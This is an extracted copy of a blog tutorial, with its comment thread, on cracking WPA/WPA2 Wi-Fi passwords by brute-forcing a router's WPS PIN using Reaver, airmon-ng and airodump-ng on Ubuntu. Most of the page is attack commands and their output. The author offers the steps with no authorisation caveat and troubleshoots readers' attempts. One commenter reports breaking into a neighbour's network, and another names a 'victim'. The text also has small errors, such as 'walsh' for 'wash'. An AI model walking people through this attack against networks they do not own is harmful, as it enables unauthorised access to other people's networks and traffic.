Learn to Hack WIFI Password With Ubuntu (WPA_WPA2)
Short Description
hacking of wireless networks...
Description
6/27/2016
Lear n to Hack W IFI passw or d w ith U buntu ( W PA/W PA2)
Learn to Hack WIFI password with Ubuntu (WPA/WPA2) July 3, 2013
Raj Amal W
Ubuntu
237 comments
In this hacking tutorial we are going to use a new vulnerability in WPA and WPA 2 (PSK/TKIP)Wireless passwords, this weak point is to attack WPS, Which is Wireless Protected Setup. This type of setup is built in 90% of routers to allow easy establishment of secure home wireless by the user, though it has been shown to fall to BruteForce Attacks. This BruteForce attack will try all combinations of Router’s PIN number (Provided by WPS) and access the router to reveal the password. This type of hack have many benets such as, You can always have the Wireless Password even if It’s changed by knowing the PIN number.
Steps To Hack WPA/WPA2 Passwords using Ubuntu (Reaver) Follow these simple steps.
Step 1 (Setting up Reaver 1.4 ) 1) Open terminal and type
sudo ‐s
https://ww w.l ear n2cr ack.com/2013/07/l ear n- to- hack- wi fi - passwor d- wi th- ubuntu.htm l
1/28
6/27/2016
Lear n to Hack W IFI passw or d w ith U buntu ( W PA/W PA2)
and then type your password. 2) Download Download Reaver Reaver (Better Download the Latest Version ) Place in a specied folder. 3) Open the Terminal and type
tar xvfz reaver‐1.4.tar.gz
4) Install dependencies
sudo apt‐get install libpcap‐dev
then
17 sudo apt‐get
install libsqlite3‐dev
1 Note: libpcap and libsqlite3 maybe included in your Ubuntu version but they are very important.
5) Enter the folder by typing
cd reaver‐1.4/src
6) Type
./configure
7) Type
make
8) Type
make install
Note: To test if Reaver have been successfully installed, Open a Terminal and Type ‘reaver’ and hit enter, it should list all Reaver’s
sub commands.
Step 2 ( Hacking WPA/WPA2 Wireless) https://ww w.l ear n2cr ack.com/2013/07/l ear n- to- hack- wi fi - passwor d- wi th- ubuntu.htm l
2/28
6/27/2016
Learn to Hack WIFI password with Ubuntu (WPA/WPA2)
After installing reaver 1.4, it’s time to proceed to the main part which is hacking wireless passwords that uses WPA/WPA2 Encryption. Requirements:
Install aircrack-ng by typing
sudo apt‐get install aircrack‐ng
Airodump-ng / Airmon-ng commands Reaver 1.4 (Install in Step 1)
1) Weneed to have the wireless BSSID (Mac address) so we use airodump-ng. Open a terminal and Type :
airmon‐ng start wlan0
17 Type
1
airodump‐ng mon0
It will lists the available wireless passwords, now copy the BSSID of the Access Point ( e.g : 00:11:28:32:49:55 ) 2) Starting the attack type:
reaver ‐i mon0 ‐b 00:11:28:32:49:55
Now it will start testing bruteforcing the PIN number of the vulnerability WPS (which we have spoke about it), and it will show you the WPA/WPA2 Password in the end of the Crack. Note: You can use walsh -i mon0 to scan for vulnerable Access Points. Screenshot:
https://www.learn2crack.com/2013/07/learn-to-hack-wifi-password-with-ubuntu.html
3/28
6/27/2016
Learn to Hack WIFI password with Ubuntu (WPA/WPA2)
17 1
For better idea follow the video on the top of this page.
Bio
Twitter
Google+
LinkedIn
Latest Posts
Hack, Ubuntu, WiFi
How To Increase Facebook ,Google Likes Or
Learn To Remove Windows 7 And 8 Password
Followers
Related Articles
https://www.learn2crack.com/2013/07/learn-to-hack-wifi-password-with-ubuntu.html
4/28
6/27/2016
Learn to Hack WIFI password with Ubuntu (WPA/WPA2)
17 1 Ubuntu Apps Command line PPA installation List August 18, 2013
How to Update the Linux kernel in Ubuntu to Latest Stable Version September 7, 2013 https://www.learn2crack.com/2013/07/learn-to-hack-wifi-password-with-ubuntu.html
5/28
6/27/2016
Learn to Hack WIFI password with Ubuntu (WPA/WPA2)
17 1 Run Windows Applications in Ubuntu Linux Easily August 31, 2013
Silvester Norman
Great Post ! I know that you can crack WiFi of a network using Ubuntu in only two steps there are many methods but no one provides results in such limited steps. Thanks Silvester Norman Change Mac Address Raj Amal
Thank you for your comment. Stay tuned for more updates Jay Phoenix
Thank you. This is a very easy tutorial to pick up on because you’ve erased a lot of the guess work others keep adding for no reason. Raj Amal
Thanks for your comment. Visit again for more updates Anonymous
Please be more specic in installing it . And what’s a terminal? Raj Amal https://www.learn2crack.com/2013/07/learn-to-hack-wifi-password-with-ubuntu.html
6/28
6/27/2016
Learn to Hack WIFI password with Ubuntu (WPA/WPA2)
Terminal is the command line interface of ubuntu. It is similar to command prompt in windows. In ubuntu open terminal by pressing key combinations Ctrl+Alt+T. Anonymous
my result is [-] Failed to initialize interface ‘mon0’ [-] Failed to recover WPA key Raj Amal
Problem with your wi adapter. Anonymous
Run terminal as super user with the command: sudo -s
Then type in your password. Retry original command and it should work.
Anonymous
Hi,
17 I have installed it, and left it running for 12 hours and it only reached 4%………am i doing it wrong or missing something
1 it taking so long. What do I type in ubuntu terminal please why Raj Amal
Maybe some problem with your router Anonymous
Hi, thank you for reply my wireless card is Intel Centrino Advanced – N6230 Do you know if this is compatible with aircrack software? The wi is working on my laptop for internet using unbuntu but it say my wireless card is ‘unknown’ when i set up monitor thank you Raj Amal
Yes, your Intel Centrino Advanced – N6230 card is compatible with aircrack-ng Anonymous
Error : pcap library not found! Raj Amal
Open terminal and type sudo apt-get install libpcap*-dev Anonymous
placed the tar xvfz reaver-1.4.tar.gz in which folder?? Anonymous
tar xvfz reaver-1.4.tar.gz tar (child): reaver-1.4.tar.gz: Cannot open: No such le or directory tar (child): Error is not recoverable: exiting now https://www.learn2crack.com/2013/07/learn-to-hack-wifi-password-with-ubuntu.html
7/28
6/27/2016
Learn to Hack WIFI password with Ubuntu (WPA/WPA2)
tar: Child returned status 2 tar: Error is not recoverable: exiting now Raj Amal
The le you downloaded may be corrupted, redownload and report here. Anonymous
still same Raj Amal
gunzip reaver-1.4.tar.gz tar xf reaver-1.4.tar
Try these commands..
Anonymous
GUYS anyone please help.im stuck at step 2(i did everything right on step1 i believe). when typing Airmon-ng start wlan0…it replies (run as root).
17
WHAT NEXT?PLEASE HELP ASAP
1
Raj Amal
Run as sudo airmon-ng start wlan0
Anonymous
guys i need help..the result is WARNING: Failed to associate with B1:B2:DC:64:B6:B8 (ESSID: aero) Anonymous
cant get aircrack please help Raj Amal
Install aircrack-ng by typing sudo apt-get install aircrack-ng Anonymous
then : sudo apt-get install libsqlite3-dev i can do dis step..it says broken packages Raj Amal
Try this sudo apt-get install -f Anonymous
i am getting ” ‘user_name’ is not in the sudoers le. This incident will be reported.” this kind of error. Raj Amal
Your error is similar to this, Try this http://www.maketecheasier.com/xing-sudo-error-in-ubuntu/2012/01/03 https://www.learn2crack.com/2013/07/learn-to-hack-wifi-password-with-ubuntu.html
8/28
6/27/2016
Learn to Hack WIFI password with Ubuntu (WPA/WPA2)
Mustafa Al Lawati
Hello for All I have one small question how log it take to get the password (how many houers) Raj Amal
Depending on your wi adapter it will take time. It took me around 7 hours to get the password. Mustafa Al Lawati
I have Realtek RTL8187 (ALFA) so how lonk it will take Also if I want hack (wpa) (TKIP/PSK) how long it will take ?
Adnan Butt I complted all stpes and waited 5-6 hours it does not work after these statements
[+]waiting for beacon from xx:xx:xx:xx:xx:xx [+] Associated with xx:xx:xx:xx:xx:xx (ESSID: Name)
17
Raj Amal
1
How is the signal Strength, May be the signal is too weak
Jim
Hi Raj, And thank you so much for this rich tutorial. I have an error message after step 1 (install reaver) 5) When i type ./congure, at the end i can see : “error: pcap library not found!” What should i do ? Thank you very much, Jim Jim
Sorry, i solved my problem, it was a problem during libcap installation. Thank you Raj Amal
Thanks for your comment t
Hi Raj, And thank you so much for this rich tutorial. I have an error message after step 1 (install reaver) 5) When i type ./congure, at the end i can see : https://www.learn2crack.com/2013/07/learn-to-hack-wifi-password-with-ubuntu.html
9/28
6/27/2016
Learn to Hack WIFI password with Ubuntu (WPA/WPA2)
“error: pcap library not found!” What should i do ? Thank you very much, Raj Amal
Open terminal and type sudo apt-get install libpcap*-dev This will solve your problem Adi
Signal strength is excellent, suggest me where i am wrong ?
Raj Amal
Post your output here which is shown in the terminal.
17
Adi
I completed all steps and waited 5-6 hours it does not work after these statements
1
[+]waiting for beacon from xx:xx:xx:xx:xx:xx
[+] Associated with xx:xx:xx:xx:xx:xx (ESSID: Name) Stuck after this.
Ali
can i do this in windows? Ali
can i do this in win7 using vimax? Raj Amal
What is vimax ? Akshay
When I try installing aircrack-ng, this is what happens: sudo apt-get install aircrack-ng Reading package lists… Done Building dependency tree Reading state information… Done Package aircrack-ng is not available, but is referred to by another package. This may mean that the package is missing, has been obsoleted, or is only available from another source However the following packages replace it: iw E: Package ‘aircrack-ng’ has no installation candidate Varun Raj https://www.learn2crack.com/2013/07/learn-to-hack-wifi-password-with-ubuntu.html
10/28
6/27/2016
Learn to Hack WIFI password with Ubuntu (WPA/WPA2)
just install aircrack-ng and reaver from software center Julian
i downloaded it of the internet Ansh Sapra
Same here….. What to do???? Varun Raj
Hi Raj Amal, thanks for this graet tutorial I completed all steps and now it is showing [+]waiting for beacon from xx:xx:xx:xx:xx:xx
[+] Associated with xx:xx:xx:xx:xx:xx (ESSID: Name) how much time will it take?
Varun Raj 17 varun raj Raj, nothing happened even after 18 hours….it is still showing
1
[+]waiting for beacon from xx:xx:xx:xx:xx:xx [+] Associated with xx:xx:xx:xx:xx:xx (ESSID: Name) what should i do? varun raj Raj Amal
Try this command reaver -i mon0 -b [bssid] -L -d 0 Al3vin
i see “(not associated )” in BSSID section while i list all wi around me. ?? help Al3vin
sorry i got the BSSID in upper sections. and i copied and typed as “reaver -i mon0 -b 74:EA:3A:B2:F4:6A” ..and it starts waiting for Beacon from …. . After a while i only see WARNING: Failed to associate with ….. (mac) ( ESSID: winame ) Can you help me please .. i am always stuck in here. How to check the vulnerability in wi’s. …. I tried “walsh -i mon0” but walsh is not command shows up. Srini Vasan
It may be due to either weak wireless card or the router is too far away. Al3vin
oh Maybe. And then how can i run walsh -i mon0 command ????? Srini Vasan
Try using it terminal Al3vin
Where would you expect me to try? I already tried it in terminal but it says walsh command not found error. soozoe https://www.learn2crack.com/2013/07/learn-to-hack-wifi-password-with-ubuntu.html
11/28
6/27/2016
Learn to Hack WIFI password with Ubuntu (WPA/WPA2)
sudo walsh -i mon0 Sergio Cruz
hahaha Anonymous
it’s “wash”, not “walsh” ὠ Al3vin
Oh Thanks. this post should had corrected its content. ὡ Al3vin
How can i know that the wi signal is good to trigger the commands ? Can you please tell about what is “Beacon” while running airodump
Al3vin
Any folder and then i will be extracted there and so do “cd reaver-1.4/src” as mentioned above.
Lakshya
17 It is getting the same error 1
nate
it says there is no such directory. what do i do
Akua Nauta
after 690 seconds nothing happends any idea? Srini Vasan
Problem with your wireless card Akua Nauta
nothing happends after 690 seconds any help?? Pingback: Ubuntu 12.04 Aircrack-ng not working | Ubuntu InfoUbuntu Info () Pingback: Ubuntu 12.04 Aircrack-ng not working « James n Sheri.com () chad
hi Raj- when i try to to install aircrack-ng, i get this msg”Package aircrack-ng is not available, but is referred to by another package. This may mean that the package is missing, has been obsoleted, or is only available from another source However the following packages replace it: iw” please assist Srini Vasan
Hi chad It has been removed from ubuntu repositories as message says. you can install it by doing following procedure 1) sudo apt-get install build-essential 2) sudo apt-get install libssl-dev https://www.learn2crack.com/2013/07/learn-to-hack-wifi-password-with-ubuntu.html
12/28
6/27/2016
Learn to Hack WIFI password with Ubuntu (WPA/WPA2)
3) wget http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz 4) tar -zxvf aircrack-ng-1.1.tar.gz 5) cd aircrack-ng-1.1 5) In the aircrack-ng-1.1 directory there is a le called common.mak, use your favorite editor to open the le and scroll down till you see the following line: CFLAGS ?= -g -W -Wall -Werror -O3
Delete the -Werror variable, so that the line now looks like the following. Save and exit. CFLAGS ?= -g -W -Wall -O3
6) Run make and sudo make install in terminal to get aircrack-ng up and running.” 17
1
for build-essential go to update manager > settings > ubuntu softwares and see if top main is checked.
brandon
Can you use this on windows?? Srini Vasan
yes, using virtual box anu17.yadav
in last time it takes a lot of time but thanks Srini Vasan
thanks for your comment anu17.yadav Srini Vasan
It depends on your router (may take at least 5-6 hours) André
Hi Raj. I’m using Reaver on Kali Linux and it keeps triying the pin 12345670 over and over. Any sugestion? Thanks in advance. Raj Amal
Stop reaver and retry it. It will resume from the pin. I had the same problem too. It solved my problem. shreeram
hey i am not able to install … it says package not founf when i type ./congure … can anyone help me ? does this software really work ? shreeram
its says pcap library not found Srini Vasan
did you nished the spet 4 correctly. https://www.learn2crack.com/2013/07/learn-to-hack-wifi-password-with-ubuntu.html
13/28
6/27/2016
Learn to Hack WIFI password with Ubuntu (WPA/WPA2)
4) Enter the folder by typing : cd reaver-1.4/src donghoon
i downloaded the reaver and its on my desktop. but when i type tar xvfz reaver-1.4.tar.gz on terminal, it saids there are no such directories……. what should i do??? Srini Vasan
Download it and place it in a specic folder then move to that directory and type ls to make sure the le is present and then type the command tar xvfz reaver-1.4.tar.gz Anonymous
what does “move to that directory” mean? i have the same problem Raj Amal
cd [Downloaded Directory] Ragu Veer
place reaver in root folder
17 Mahmoud what is the password ??!!!
1
Raj Amal
Your root password
Arth Patel
i have problem like that……………please help Raj Amal
Just use sudo apt-get install aircrack-ng Otmane
Thank you for this simple well explained tuto, have been on many tutos but this is the best… please see attached picture and tell me if i am on the right path. thank you Otmane
its been like 13 hours and only 3.67% completed is that normal? Raj Amal
Its because of your wi adapter. Otmane
but at the end it will get it right? Kunal
showing error in mon0.. what to do? Mohammed
help plz i did all ur steps here but when i write airmon-ng i got nothing why ??? Raj Amal https://www.learn2crack.com/2013/07/learn-to-hack-wifi-password-with-ubuntu.html
14/28
6/27/2016
Learn to Hack WIFI password with Ubuntu (WPA/WPA2)
Try running live Ubuntu instead of VirtualBox Apple
Hello, why it write Interface mon0: ioctl(SI0CGIFINDEX) failed: No such device pratik
did u got the ans Mohamad Ashi
I’m having the same problem, did anyone nd a solution for this???? Rajith
Hey Guys, mon0 is simply the interface name, i guess so. So what i did was to change to wlan0, which is the network
interface name.u’ll could nd out what’s the interface by giving #ifcong# command in the terminal. It worked for me..:) Biju Mondal
17 in this tutorial . they are getting signal from wlan0, which is their router.. check which type of router u use., my one is 1
wlp2s0.. check yours.
bhaaradwaaj ramakrishnan
hi i have installed and congured everything but in airodump it shows only one network BSSID while i have bunch of other networks around..? any reasons? Bob Freeber
Disconnect your wireless card from the router in which it is connected. othmane
for me it does not work it said “enable” Raj Amal
What enable ? Balram Singh
downloaded it. extracted it but when put this commond – tar xvfz reaver-1.4.tar.gz – it says balram@balram-SatelliteC640:~$ sudo -s [sudo] password for balram: root@balram-Satellite-C640:~# tar xvfz reaver-1.4.tar.gz tar (child): reaver-1.4.tar.gz: Cannot open: No such le or directory tar (child): Error is not recoverable: exiting now tar: Child returned status 2 tar: Error is not recoverable: exiting now root@balram-Satellite-C640:~# Ragu Veer
place the reaver in root folder cassie
how??? nando https://www.learn2crack.com/2013/07/learn-to-hack-wifi-password-with-ubuntu.html
15/28
6/27/2016
Learn to Hack WIFI password with Ubuntu (WPA/WPA2)
doesn’t work for me!!! bil(patto hex)
place in home folder reaver-1.4.tar.gz le bil(patto hex)
no place in home folder bil(patto hex)
place the reaver1.4.tar.gz le in the home folder then again do te command tar xvfz reaver-1.4.tar.gz Gaspard Diallo
Look for the path where you downloaded the reaver-1.4.tar.gz le and type the command – tar xvfz pathToYourFile/reaver-1.4.tar.gz
17 X3nFactor Why not just do “sudo apt-get install reaver”?
1
jesper
root problem? Raj Amal
What root problem ? smart
Hey hi, I have the pin and password of my AP,I cracked it using Reaver but the password seems to be changed now. how can I know the new password without trying the entire process or is there a way to try a pin manually using reaver? emp
Here’s my problem, keeps on switching mon0 to diff. channels for some reason, any help ? act
mine too Fraser
Hey I’m getting this when I put in the ” reaver -i mon0 -b 00:11:22:33:44:55″ command Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner [-] Failed to initialize interface ‘wlan0’ [-] Failed to recover WPA key any help will be much appreciated, Thanks Tom
I had to make it root run “sudo -s” before running “reaver -i mon0 -b 00:11:22:33:44:55” https://www.learn2crack.com/2013/07/learn-to-hack-wifi-password-with-ubuntu.html
16/28
6/27/2016
Learn to Hack WIFI password with Ubuntu (WPA/WPA2)
aryoatha
does it have like to be long? beacuse i’ve waited it for like 20 minutes and it still waiting for beacon. Help please! #GTS_07
having the same problem. please help! Chris Van Yperen
Same problem, did anyone nd a solution? syed
Pls tel me how to hack wi with samsung mobile Raj Amal
Use backtrack on android
Bilal Idrees Mirxa
Can anyone help? plz?
Raj Amal
17 May be the wi router is not supported 1
Андрей Хома
what does it mean?
ZigZag
Hi to everybody! Can somebody tell is this normal or I did something wrong? please help repeatedly says: WPS transaction failed (code: 0x02), re-trying last pin TNX Raj Amal
Retry it jack
HI please how i can strat the attack should i wait everything to nish sanjay
is this adapter will work atheros ar5007 802.11 b/g Raj Amal
It will work anonymous
how do i do that? kkid170
where do i download reaver from ganesh https://www.learn2crack.com/2013/07/learn-to-hack-wifi-password-with-ubuntu.html
17/28
6/27/2016
Learn to Hack WIFI password with Ubuntu (WPA/WPA2)
hi iam ganesh i tried to install reaver as u given above commands. but while at make install command i got an error like rm -f /usr/local/bin/reaver /usr/local/bin/wash /usr/local/bin/walsh if [ ! -d /usr/local/etc/reaver ]; then mkdir -p /usr/local/etc/reaver; if [ ! -e /usr/local/etc/reaver/reaver.db ]; then cp reaver.db /usr/local/etc/reaver/reaver.db && chmod -R a+rw /usr/local/etc/reaver; if [ -e wash ]; then cp wash /usr/local/bin/wash; if [ -e reaver ]; then cp reaver /usr/local/bin/reaver;
what i have to type here please send me soon Ananya
error pcap library not found 17 caleb after getting the pin and etc what i have to do with that to connect with the wi
1
Raj Amal
Enter the pin in the password box and connect to the Wi
Lela
How long it takes to nish beacon counting? Srini Vasan
it depends on the router you use Sandeep
i got error when typing airodump-ng mon0 root@sandeep-Inspiron-N5050:~/reaver-1.4/src# airodump-ng mon0 Interface mon0: ioctl(SIOCGIFINDEX) failed: No such device root@sandeep-Inspiron-N5050:~/reaver-1.4/src# ilikethis
after u type airodump-ng mon0 it will show u a list of password but it wont let u type why?wont it let u type anything do u have 2 wait or what? NiCoLaS
thanks man it’s really work…..but i get confused what does WPS PIN mean????? and is there any way to hack router password using ubuntu …….. Srini Vasan
WPS, or Wi-Fi Protected Setup, is a feature built into many modems and routers, including those manufactured by Belkin. It is designed to simplify the process of connecting to a wireless network from a computer or other device, providing a user-friendly front-end to encryption technologies such as WEP, or Wired Equivalent Privacy, and WPA, or Wi-Fi Protected Access, which prevent unauthorized devices from using a wireless network. NiCoLaS https://www.learn2crack.com/2013/07/learn-to-hack-wifi-password-with-ubuntu.html
18/28
6/27/2016
Learn to Hack WIFI password with Ubuntu (WPA/WPA2)
keep it in home folder….. NiCoLaS
it took me 6 hrs to hack 13 digit long password… eddie
hi, please what is wrong with my output? Jan
when I typed the reaver -i mon0 -b (00:11:28:32:49:55)with the vicitm’s bssid I got a spam of warnings [!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: (null))
I have no Idea what is going on …any help appriciated.
17
Leeness
Same here..did someone nd a solution to this problem? ImmortalSU
1
You have to become a root rst sudo -s then center to the reaver directory cd reaver-1.4 then type in reaver -i mon0 – b 90:F6:52:21:47:08
Josh
aircrack is not available in repos. how can I get it? NiCoLaS
this is working for only one wi network but not for all ……why this….I have successfully hacked my neighbour wi….but… now I moved to new place and it’s not working ……… just say “Waiting” …and I waited for a long time…bt nothing happens……..help…..plz bil(patto hex)
in home folder. bil(patto hex)
this error i am getting please help root@patto-Lenovo-G580:~# cd reaver-1.4/src root@patto-Lenovo-G580:~/reaver-1.4/src# ./congure checking for gcc… gcc checking whether the C compiler works… yes https://www.learn2crack.com/2013/07/learn-to-hack-wifi-password-with-ubuntu.html
19/28
6/27/2016
Learn to Hack WIFI password with Ubuntu (WPA/WPA2)
checking for C compiler default output le name … a.out checking for sufx of executables … checking whether we are cross compiling… no checking for sufx of object les… o checking whether we are using the GNU C compiler … yes checking whether gcc accepts -g… yes checking for gcc option to accept ISO C89… none needed checking for pcap_open_live in -lpcap… no error: pcap library not found! root@patto-Lenovo-G580:~/reaver-1.4/src# make install ]make: *** No rule to make target `install’. Stop.
root@patto-Lenovo-G580:~/reaver-1.4/src# make install make: *** No rule to make target `install’. Stop.
root@patto-Lenovo-G580:~/reaver-1.4/src# make make: *** No targets specied and no makele found. Stop. 17 root@patto-Lenovo-G580:~/reaver-1.4/src# reaver
1 command not found reaver: root@patto-Lenovo-G580:~/reaver-1.4/src#
DotMan
If you’re still trying this, all you have to do is type “apt-get install reaver” in terminal (Without the quotes) and then go on to step 2 (Where it says (Hacking WPA/WPA2 Wireless)) Shihaam Abdul Rahman
where do i have to keep the reaver-1.4.tar.gz le Deepak
[+] Waiting for beacon from 30:85:A9:36:9A:80 [!] WARNING: Failed to associate with 30:85:A9:36:9A:80 (ESSID: (null)) [!] WARNING: Failed to associate with 30:85:A9:36:9A:80 (ESSID: (null)) [!] WARNING: Failed to associate with 30:85:A9:36:9A:80 (ESSID: ABHISHEK) [!] WARNING: Failed to associate with 30:85:A9:36:9A:80 (ESSID: ABHISHEK) [!] WARNING: Failed to associate with 30:85:A9:36:9A:80 (ESSID: ABHISHEK) [!] WARNING: Failed to associate with 30:85:A9:36:9A:80 (ESSID: ABHISHEK) [!] WARNING: Failed to associate with 30:85:A9:36:9A:80 (ESSID: ABHISHEK) https://www.learn2crack.com/2013/07/learn-to-hack-wifi-password-with-ubuntu.html
20/28
6/27/2016
Learn to Hack WIFI password with Ubuntu (WPA/WPA2)
[!] WARNING: Failed to associate with 30:85:A9:36:9A:80 (ESSID: ABHISHEK) [!] WARNING: Failed to associate with 30:85:A9:36:9A:80 (ESSID: ABHISHEK) rajit
m also having the same problem is there any solution for it Enrico Gnauk
I had the same problem after installing Ubuntu 14.04. ! There is a very usefull site: http://forum.aircrack-ng.org/index.php?topic=666.0 User: “kcdtv” wrote there the solution for the problem….. Chris Van Yperen
The kernels are not available through the link that is proposed in this solution, is there any other
solution?
Nandagiri Akhilesh when i type wlan0 its not showing any network or wi and my ubuntu 14.04 not showing wi in its top signal any answer
17
Nicko Glass
1 all the way to the point where you highlight the bssid you want to use. the video does not tell you to use ctrl c to i get freeze the airodump and provide you with a command line to type the next command. so i press ctrl c (should i do this part
some other way???) the command line reads exactly as it does in the video. i type in reaver -i mon0 -b thebssid hit enter and it tells me reaver command not found. ive searched the web. PLEASE HELP!!! ANYONE ὤ Андрей Хома
i cannot conect to my bssid Claire
when I try to type airodump-ng mon0 it says: “Insteface mon0: ioctl(SIOGGIFINDEX) failed: No such device” what do i have to do?????? ravi
i am getting the same error.. did u get any solution Abhijith K.A
airodump-ng mon0 not working it says not found and it says I have to kill some programs Manigandan Sp
Can u please explain it briey. Each and every minute step. I’m new to linux. Please tell wen to change the name,where to place the app and wat step we have to follow!!! Bashar Albasheer
me too…plzzz im not new but i dnt know about the stuff u use …i never dealt with it ὡ Dark rose
root@Dark-rose:~/Downloads# sudo apt-get install libpcap-dev Reading package lists… Done https://www.learn2crack.com/2013/07/learn-to-hack-wifi-password-with-ubuntu.html
21/28
6/27/2016
Learn to Hack WIFI password with Ubuntu (WPA/WPA2)
Building dependency tree Reading state information… Done E: Unable to locate package libpcap-dev root@Dark-rose:~/Downloads# what is the problem i cant understand.. Leeness
It’s not working to install aircrack After typing sudo apt-get install aircrack-ng in terminal I get this: Package aircrack-ng is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or is only available from another source However the following packages replace it:
iw
17 tac the same problem
1
did you nd any solution Leeness
Yes, i don’t remember how but i Googled it and searched a LOT and nally found the solution. Just Google it and nd it ! SrinivasReddy AnnapaReddy
when i am typing in terminal tar Home reaver-1.4.tar.gz its getting invalid archive format. Please any one Help me. sultan
Thank you this woked , thank you sooooo much bro , thank you Muhammad Zaid
reaver -i mon0 -b C8:3A:35:4B:B8:09 Where to write this command??? There is no place in console to write command. You can see in Terminal Snap. BrainBomber
Just press CTRL + C to stop the process, but you need to collect a big number of Packages & Bacons, then enter: ” reaver -i mon0 -b XX:XX:XX:XX:XX:XX ” and thats all Muhammad Zaid
reaver -i mon0 -b C8:3A:35:4B:B8:09 Where to write this command??? There is no place in console to write command. You can see in Terminal Snap. BrainBomber
Just press CTRL + C to stop the process, but you need to collect a big number of Packages & Bacons, then enter: reaver -i mon0 -b XX:XX:XX:XX:XX:XX hazabbaskhan
Hi to all can we Ubuntu in android plz help https://www.learn2crack.com/2013/07/learn-to-hack-wifi-password-with-ubuntu.html
22/28
6/27/2016
Learn to Hack WIFI password with Ubuntu (WPA/WPA2)
Himanshu Barmola
Error while getting interface ags:no such device found:—root@hackgod-RV413-RV513:~/reaver-1.4# airmon-ng start wlan0 Found 5 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! PID Name 736 avahi-daemon 737 avahi-daemon
922 NetworkManager
1364 wpa_supplicant 4050 dhclient
17 Process with PID 4050 (dhclient) is running on interface wlan0
1
Interface Chipset Driver
wlan0 Broadcom wl – [phy0]mon0: ERROR while getting interface ags: No such device (monitor mode enabled on mon0) root@hackgod-RV413-RV513:~/reaver-1.4# mubasher chaudhary
I have the same problem shiv
when i type sudo apt-get install aircrack-ng then this is showing this……help plzzzz Aboud Scott
try “sudo -s” rst, then try to install aircrack-ng sajan
an error like this… any solution please thanks in advance Emily
Hello, When I enter the airodump-ng mon0 problem I face this error: Interface mon0: ioctl(SIOCGIFINDEX) failed: No such device Here are the codes: root@MacBookPro:~/reaver-1.4/src# airmon-ng start wlan0 https://www.learn2crack.com/2013/07/learn-to-hack-wifi-password-with-ubuntu.html
23/28
6/27/2016
Learn to Hack WIFI password with Ubuntu (WPA/WPA2)
Found 5 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! PID Name 800 NetworkManager 838 avahi-daemon 842 avahi-daemon 980 wpa_supplicant 3894 dhclient Process with PID 3894 (dhclient) is running on interface wlan0
Interface Chipset Driver
wlan0 Broadcom wl – [phy0]mon0: ERROR while getting interface ags: No such device
17
(monitor mode enabled on mon0)
1
root@MacBookPro:~/reaver-1.4/src# airodump-ng mon0
Interface mon0: ioctl(SIOCGIFINDEX) failed: No such device root@MacBookPro:~/reaver-1.4/src# sudo airodump-ng wlan1 Interface wlan1: ioctl(SIOCGIFINDEX) failed: No such device root@MacBookPro:~/reaver-1.4/src# sudo airodump-ng wlan0 ioctl(SIOCSIWMODE) failed: Operation not supported ARP linktype is set to 1 (Ethernet) – expected ARPHRD_IEEE80211, ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make sure RFMON is enabled: run ‘airmon-ng start wlan0 ‘ Sysfs injection support was not found either. root@MacBookPro:~/reaver-1.4/src# iwcong eth0 no wireless extensions. wlan0 IEEE 802.11abg ESSID:”ist” Mode:Managed Frequency:2.462 GHz Access Point: 38:60:77:02:48:87 Bit Rate=39 Mb/s Tx-Power=200 dBm Retry short limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:off Link Quality=49/70 Signal level=-61 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
https://www.learn2crack.com/2013/07/learn-to-hack-wifi-password-with-ubuntu.html
24/28
6/27/2016
Learn to Hack WIFI password with Ubuntu (WPA/WPA2)
Tx excessive retries:0 Invalid misc:0 Missed beacon:0 lo no wireless extensions. root@MacBookPro:~/reaver-1.4/src# sudo iwcong wlan0 mode monitor Error for wireless request “Set Mode” (8B06) : SET failed on device wlan0 ; Operation not supported. root@MacBookPro:~/reaver-1.4/src# sudo iwcong wlan1 mode monitor Error for wireless request “Set Mode” (8B06) : SET failed on device wlan1 ; No such device. root@MacBookPro:~/reaver-1.4/src# airmon-ng start wlan0
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them!
17
PID Name
1
800 NetworkManager 838 avahi-daemon
842 avahi-daemon 980 wpa_supplicant 3894 dhclient Process with PID 3894 (dhclient) is running on interface wlan0 Interface Chipset Driver wlan0 Broadcom wl – [phy0]mon0: ERROR while getting interface ags: No such device (monitor mode enabled on mon0) root@MacBookPro:~/reaver-1.4/src# airodump-ng mon0 Interface mon0: ioctl(SIOCGIFINDEX) failed: No such device iwcong gives the following: root@MacBookPro:~/reaver-1.4/src# iwcong eth0 no wireless extensions. wlan0 IEEE 802.11abg ESSID:”ist” Mode:Managed Frequency:2.462 GHz Access Point: 38:60:77:02:48:87 Bit Rate=52 Mb/s Tx-Power=200 dBm Retry short limit:7 RTS thr:off Fragment thr:off Encryption key:off https://www.learn2crack.com/2013/07/learn-to-hack-wifi-password-with-ubuntu.html
25/28
6/27/2016
Learn to Hack WIFI password with Ubuntu (WPA/WPA2)
Power Management:off Link Quality=52/70 Signal level=-58 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 lo no wireless extensions. Please help! Andrei Macsentian
Lol… I have the same computer used: Dell Inspiron 1545
Andrei Macsentian
You can see the name in the terminal title.
ASHOK SAINI cd reaver-1.4/src not working (no such directory exist) ,,although reaver is instaleld
17 DK
[!]1WARNING: Failed to associate with FA:16:54:38:5D:C9 (ESSID: (null)) this msg lled my screen…. plz help
brendanndley It says Interface mon0: ioctl(SIOCGIFINDEX) failed: No such device HELP brendanndley
